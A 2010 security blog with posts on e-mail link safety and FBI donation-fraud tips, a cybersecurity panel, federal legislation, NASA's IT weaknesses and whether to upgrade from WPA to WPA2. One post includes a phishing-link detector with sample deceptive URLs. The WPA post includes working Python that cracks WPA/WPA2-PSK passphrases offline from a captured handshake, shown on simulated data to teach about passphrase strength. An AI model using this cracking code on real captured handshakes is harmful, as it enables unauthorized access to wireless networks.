Friday, February 12, 2010

Stop clicking

I know this isn’t sexy cutting-edge security stuff and it’s super basic to some of you out there. However, the most common path for bad things to get onto your computer is you inviting them in. So some of you need a refresher on web and e-mail dangers.
What prompted this line of thought was the FBI and the National Center for Disaster Fraud (NCDF) providing a press release that gives people that wish to donate to a disaster relief fund a list of items to watch for. (Aside: sad that there is a need for an organization like the NCDF)
While absolutely essential for any kind of donation effort, much of it is good practice for navigating e-mail and the web at any time.
For me, the biggest advice I can give is this:
Do NOT click on a link in an e-mail.
If the link is to - I open a separate browser and type in and see if I can navigate to the specific page that I need. If I cannot navigate to the page, then I will type in the complete link into a browser.
The reason to avoid clicking on a link in an e-mail is that where the link SAYS it is going and where it actually TAKES you can be two VERY different things. The place you actually end up is determined by the underlying HTML of the link (the href attribute), not by the words you click on. Even a full URL written out as the link text is just a label the sender chose; hovering over the link in most mail clients shows the real destination, and that is the only part that matters.
Just to prove my point, if I put in this blog and you click on it (against my earlier advice – you can click on it), it will take you to an archive of my earlier blog on Technology Security hosted at Typepad.
Real simple: do not click on a link in an e-mail. Even if it is from someone you know!
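To make the href-versus-text gap concrete, here is an added example (my code, not part of the FBI material or the original post) that pulls every link out of an HTML e-mail body and flags the ones whose visible text names one site while the href goes somewhere else, whose destination hides the real host behind a user@host prefix, or whose destination is a bare IP address. The sample message is constructed for the example, and the domain-comparison rule (same host, or one a subdomain of the other) is a deliberate simplification that uses no public-suffix list.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Visible link text that itself looks like a URL or a bare domain name.
URL_LIKE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?", re.I)
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def host_of(url_or_domain):
    """Lower-cased host of a URL, or of a bare domain written as link text."""
    s = url_or_domain.strip()
    if "://" not in s:
        s = "http://" + s
    return (urlparse(s).hostname or "").lower()


def same_site(a, b):
    """Crude match: identical hosts, or one is a subdomain of the other (no public-suffix list)."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def suspicious_links(html):
    """Return (href, text, reason) for each link whose text and real destination disagree."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        parsed = urlparse(href.strip())
        if parsed.scheme not in ("http", "https"):
            findings.append((href, text, "non-http scheme %r" % parsed.scheme))
            continue
        real_host = (parsed.hostname or "").lower()
        if parsed.username is not None:
            # http://trusted.example@evil.example/ takes you to evil.example
            findings.append((href, text, "userinfo before host; real host is %s" % real_host))
        elif IP_LITERAL.match(real_host):
            findings.append((href, text, "destination is a bare IP address %s" % real_host))
        if URL_LIKE.fullmatch(text):
            shown_host = host_of(text)
            if not same_site(shown_host, real_host):
                findings.append((href, text, "text shows %s but href goes to %s" % (shown_host, real_host)))
    return findings


# Constructed sample e-mail body (not a real message): one honest link and two
# of the tricks described above.  Every domain here is made up for the example.
SAMPLE_EMAIL = """
<p>Please give today at <a href="http://redcross.org.donate-relief.example/">www.redcross.org</a>.</p>
<p>Our real page: <a href="https://www.redcross.org/donate">https://www.redcross.org/donate</a></p>
<p><a href="http://www.redcross.org@203.0.113.5/login">Secure donor login</a></p>
"""

if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_EMAIL):
        print("SUSPICIOUS: %-40s %s" % (text, reason))
```

Run it and the first and third links are reported while the second, whose text and href agree, is not. The same check is worth running over the raw HTML of any message before anyone in the office clicks on it.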
Ok – here is what the FBI recommends - enjoy:
  • Do not respond to any unsolicited (spam) incoming emails, including clicking links contained within those messages
  • Be skeptical of individuals representing themselves as surviving victims or officials asking for donations via email or social networking sites
  • Beware of organizations with copycat names similar to but not exactly the same as those of reputable charities
  • Rather than following a purported link to a website, verify the legitimacy of nonprofit organizations by using various Internet-based resources to confirm the group’s existence and its nonprofit status
  • Be cautious of emails that claim to show pictures of the disaster areas in attached files, because the files may contain viruses. Open attachments only from known senders.
  • To ensure your money is received and used for its intended purposes, make contributions directly to known organizations rather than relying on others to make the donation on your behalf
  • Do not be pressured into making contributions, as reputable charities do not use such tactics
  • Do not give your personal or financial information to anyone who solicits contributions. Providing such information may compromise your identity and make you vulnerable to identity theft. 
  • Avoid cash donations if possible. Pay by debit or credit card, or write a check directly to the charity. Do not make checks payable to individuals.

Texas Lyceum and Cyber Security

I attended an event at the Majestic Theater in downtown San Antonio last Friday night with the subject: "Our Growing Lives Online: Safe or Not?" The event was hosted by the Texas Lyceum organization and was to debate whether our current laws and technologies adequately protect our data and identities online.

It was an interesting group that was assembled, and for those interested in watching the discussion, it will be broadcast in the major markets in Texas on PBS sometime over the next month or so (Feb. 18th @ 8:00 PM on KLRU in Austin). The speakers were a good fit of business, policy, and research. I had the opportunity to speak with one of the panelists, Dr. Nicole Beebe, at another event this past Monday. We both agreed that the Q&A session was far too short and that we would have liked the social engineering aspects of cyber security explored at some level.



My view on cyber security is that it is 20% technology, policies, standards, guidelines, and procedures, and the other 80% is making sure everyone is aware of the policies, standards, guidelines, and procedures and that everyone knows how to use the security technologies.

As with many things, education is the key.



Bill Morrow of CSIdentity was an entertaining character that livened up the conversation, and Ari Schwartz provided solid government policy and legislation data. Robert Hansen of SecTheory may have seemed a little more BlackHat than he wanted to when trying to prove he had street cred with all the crackers out there. Dr. Beebe presented excellent comments on data privacy vs. usage from both an academic and an investigative perspective. No doubt she has tracked down (or would love to track down) some of Mr. Hansen's friends...

Overall, I highly recommend watching it or setting it to record on your DVR. I'll be the shining head smack-dab in the middle of the audience.

Michael Mongold

Friday, February 5, 2010

Cybersecurity Enhancement Act of 2009 Passes the House 422-5

Over the next four years, each American will pay 75 cents per year to fund projects that will require more extensive data security standards - that is if it receives a similar reception in the Senate as it did in the House on Thursday.

H.R. 4061 calls out the National Science Foundation and NIST in particular, to bolster cybersecurity research and enhance data asset protection schemas. The Office of Management and Budget states that Federal security agencies spend roughly 10% of their IT infrastructure budget on cybersecurity or roughly $6 billion per year.

NIST (National Institute of Standards and Technology) will be required to develop "checklists of settings and options that minimize security risks associated with computer systems that are, or are likely to become, widely used within the federal government."

Special to my interest is the directive to:
"establish a program to support development of technical standards, metrology, testbeds, and conformance criteria with regard to identity management research and development" 
The funding to support research of cybersecurity initiatives is a welcome sight and well-timed with the increase in cyberattacks from Chinese and Iranian sources. The expectation is, and should be, that any significant physical attack on the United States will be coordinated with a significant attack on our information infrastructure.

Hopefully the funding and political stamina will continue to flow as cyber threats to our nation continue to evolve.

NASA still struggling with IT Security

Some time ago, I snarkily stated that InfoSec is not rocket science. Apparently it's much harder than that. According to the testimony of Cristina Chaplain, GAO director for acquisition and sourcing management, before a House panel, NASA's IT security is still having hiccups. As reported back in June, NASA fubar'd their PIV deployment and cost the taxpayers an additional $1 million. Now it looks like they are having difficulties controlling patching and AV implementations.

According to the testimony, during 2007 and 2008 NASA reported over 1,100 incidents in which unauthorized access to sensitive information was obtained or malicious code was installed on NASA systems.

The deficiencies present real and credible dangers to NASA personnel and their operations. With this many successful intrusions, the opportunity to access, modify, or delete "mission critical" information is no longer hypothetical.

If NASA follows through, Ms. Chaplain's testimony provides a ray of hope for the embattled organization:

"The deputy administrator also stated that NASA will continue to mitigate the information security weaknesses identified. The actions identified by the deputy administrator, if effectively implemented, will improve the agency's information security program."
It is typical for businesses and government organizations to be concerned about the integrity of their data, but few other scenarios could create a more tangible need for the availability and accuracy of their assets than a multi-billion dollar venture where lives are at stake.

Let's hope that future news about NASA's IT Security is lauding their standing as an InfoSec role model rather than trying explain its role in a tragedy.

Tuesday, February 2, 2010

WPA vs WPA2 - Worth the upgrade?

BLUF: WPA (Wi-Fi Protected Access) supports only TKIP (Temporal Key Integrity Protocol), and TKIP has already been weakened a couple of times (the Beck-Tews attack in 2008 and the Ohigashi-Morii refinement of it in 2009). Since TKIP was designed as a wrapper around the old WEP/RC4 cipher so that it could run on existing hardware, it is reasonable to expect that more weaknesses will be found.

WPA2 uses AES (Advanced Encryption Standard) in CCMP mode, and as of this writing there is no known practical attack on CCMP itself, so it is considered unbreakable (for now). One caveat that applies to both: if you run in pre-shared-key mode, the passphrase is still the weak point. A captured four-way handshake lets an attacker test passphrase guesses offline no matter which cipher is in use, so the upgrade buys nothing against a guessable passphrase.
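As an added example (my code, not from the original post or any vendor), here is the part of the picture that is identical for WPA and WPA2 when the network runs in pre-shared-key mode, which the post does not specify either way: the passphrase-to-PMK derivation, the PTK/KCK derivation from the four-way handshake, and the MIC check an attacker uses to test passphrase guesses offline against a sniffed message 2. The SSID, MAC addresses, nonces, handshake frame and word list are all constructed for the example; the PMK function can be checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
"""
WPA/WPA2-PSK key derivation and an offline passphrase check against a captured
four-way handshake.  The PSK path is the same for WPA (TKIP) and WPA2 (CCMP):
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits) and
PTK = PRF(PMK, "Pairwise key expansion", MACs || nonces).
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK (the PSK) from passphrase and SSID, per IEEE 802.11i section 8.5.1."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce, nbytes=64):
    """PTK from the PMK, both MAC addresses and both nonces.
    64 bytes for TKIP, 48 for CCMP; the first 16 bytes (the KCK) are the same either way."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck, eapol_frame, key_descriptor_version):
    """MIC over an EAPOL-Key frame whose MIC field is zeroed.
    Descriptor version 1 (TKIP) uses HMAC-MD5; version 2 (CCMP) uses HMAC-SHA1 truncated to 128 bits."""
    if key_descriptor_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    if key_descriptor_version == 2:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version")


def build_eapol_m2(snonce, key_descriptor_version):
    """A minimal EAPOL-Key message 2 (pairwise, MIC bit set, MIC zeroed, empty key data)."""
    key_info = 0x0108 | key_descriptor_version          # pairwise + MIC + descriptor version
    key_len = 32 if key_descriptor_version == 1 else 16  # TKIP 256-bit key, CCMP 128-bit key
    body = (b"\xfe" + key_info.to_bytes(2, "big") + key_len.to_bytes(2, "big")
            + b"\x00" * 7 + b"\x01"                              # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
            + b"\x00" * 16 + b"\x00\x00")                         # zeroed MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(candidates, ssid, aa, spa, anonce, snonce, eapol_frame, mic, version):
    """Return the candidate passphrase whose KCK reproduces the captured MIC, or None."""
    for passphrase in candidates:
        kck = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, version), mic):
            return passphrase
    return None


# Constructed "capture" (no real network): SSID, AP and client MACs, both nonces,
# message 2 with its MIC field zeroed, and the cipher the AP was configured for.
SSID = b"CorpWiFi"
AA = bytes.fromhex("001122334455")        # authenticator (AP) MAC, made up
SPA = bytes.fromhex("66778899aabb")       # supplicant (client) MAC, made up
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
VERSION = 1                               # 1 = TKIP (WPA); set to 2 for CCMP (WPA2)
EAPOL_M2 = build_eapol_m2(SNONCE, VERSION)
WORDLIST = ["password", "letmein", "CorpWiFi2010", "Summer2009!"]


def simulate_client_mic(passphrase):
    """The MIC a client holding this passphrase would send in message 2 (stands in for a sniffed frame)."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_M2, VERSION)


if __name__ == "__main__":
    captured = simulate_client_mic("CorpWiFi2010")
    print("recovered:", crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, EAPOL_M2, captured, VERSION))
```

Flip VERSION from 1 to 2 and the MIC algorithm and PTK length change, but the 4096-iteration PBKDF2 step an attacker must grind through per guess does not, so a weak passphrase is the cheaper path in on either network. In enterprise (802.1X) mode there is no shared passphrase and this path disappears entirely.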

However, is it worth the cost and trouble to upgrade?

When prioritizing what fires to fight within my organization, I break it down to:

How much does the safeguard cost? What is the likelihood that the exploit will be realized? And finally, how much would the exploit cost if realized?

That's usually the order I look at things. How much is this going to run me? Is it really that likely? Only then do I look at the value proposition of the solution against the exploit cost so I can push it up to the bean counters.

Also, if we have a number of WAPs (Wireless Access Points) deployed that can run WPA but not WPA2, then migrating to WPA2 will affect my budget beyond man hours.

Why do so many legacy WAPs run WPA and not WPA2? Because WPA was an excellent stopgap made to run on wimpy WEP-era hardware. TKIP reuses the RC4 stream cipher those chips already implemented and adds per-packet key mixing and the Michael integrity check in firmware, so it is not very resource intensive. WPA2, on the other hand, uses AES-CCMP, which is incredibly robust but at a price: it needs an AES engine or a good deal more CPU. Hardware that could handle the processing needs of TKIP just doesn't have the oomph to crunch AES.

This means that if your legacy hardware falls into this category, migrating to WPA2 is not quite as trivial a task.

So let's get back to our decision...

First you must look at the weaknesses of WPA. In order to exploit WPA, someone would need to be incredibly motivated to try to break TKIP. If someone wants in THAT bad, they’ll probably find another way to get what they want. Plus, the TKIP attacks that have been reported are limited and more complex than the vast majority of bad guys out there are capable of: the published attack recovers the keystream and MIC key for short packets sent from the access point to a client (ARP, for instance), lets the attacker inject a handful of forged packets, takes on the order of fifteen minutes per attempt, and does not recover the pre-shared key or let the attacker read ordinary traffic. That doesn't mean that someone won't leverage TKIP's weaknesses to hax0r your intertubz, but it does make it significantly less likely.

I believe in the "electric hacker" theory when it comes to threat agents. The vast majority of the time, someone trying to access your assets is going to take whichever path provides the least amount of resistance. Just like electricity. Least effort will usually be the motivating factor in what exploits will be attempted. It doesn't mean that there aren't some overachieving miscreants out there, just means that there are not a lot of them and they are probably focused on more rewarding booty than what you can provide.

If you are looking at upgrading 10 WAPs at $700 each, you will spend seven grand plus the man-hours to deploy these new devices. If you have the budget and the time, then you might as well. However, most organizations I know are not blessed in that way. Time and money are tight and you have to fight the fires with what limited resources you have.

My pragmatic opinion is: The threat is not likely enough to spend the money and time to mitigate the risk. Most infosec teams have more pressing issues to address.

Your thoughts?

Michael Mongold